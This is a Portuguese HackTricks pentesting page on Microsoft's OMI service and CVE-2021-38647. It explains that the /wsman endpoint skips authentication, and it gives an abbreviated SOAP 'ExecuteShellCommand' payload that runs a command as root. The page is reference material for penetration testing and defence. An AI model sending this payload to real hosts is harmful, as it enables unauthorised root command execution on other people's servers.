hacktricks/network-services-pentesting/5985-5986-pentesting-omi.md

4.5 KiB

5985,5986 - Pentesting OMI

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Informações Básicas

OMI é apresentado como uma ferramenta open-source pela Microsoft, projetada para gerenciamento de configuração remota. É particularmente relevante para servidores Linux no Azure que utilizam serviços como:

  • Automação Azure
  • Atualização Automática Azure
  • Suite de Gerenciamento de Operações Azure
  • Log Analytics Azure
  • Gerenciamento de Configuração Azure
  • Diagnostics Azure

O processo omiengine é iniciado e escuta em todas as interfaces como root quando esses serviços são ativados.

As portas padrão usadas são 5985 (http) e 5986 (https).

Vulnerabilidade CVE-2021-38647

Como observado em 16 de setembro, servidores Linux implantados no Azure com os serviços mencionados são suscetíveis devido a uma versão vulnerável do OMI. Essa vulnerabilidade reside no tratamento de mensagens do servidor OMI através do endpoint /wsman sem exigir um cabeçalho de Autenticação, autorizando incorretamente o cliente.

Um atacante pode explorar isso enviando um payload SOAP "ExecuteShellCommand" sem um cabeçalho de Autenticação, forçando o servidor a executar comandos com privilégios de root.

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>

Para obter mais informações sobre esta CVE verifique aqui.

Referências

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!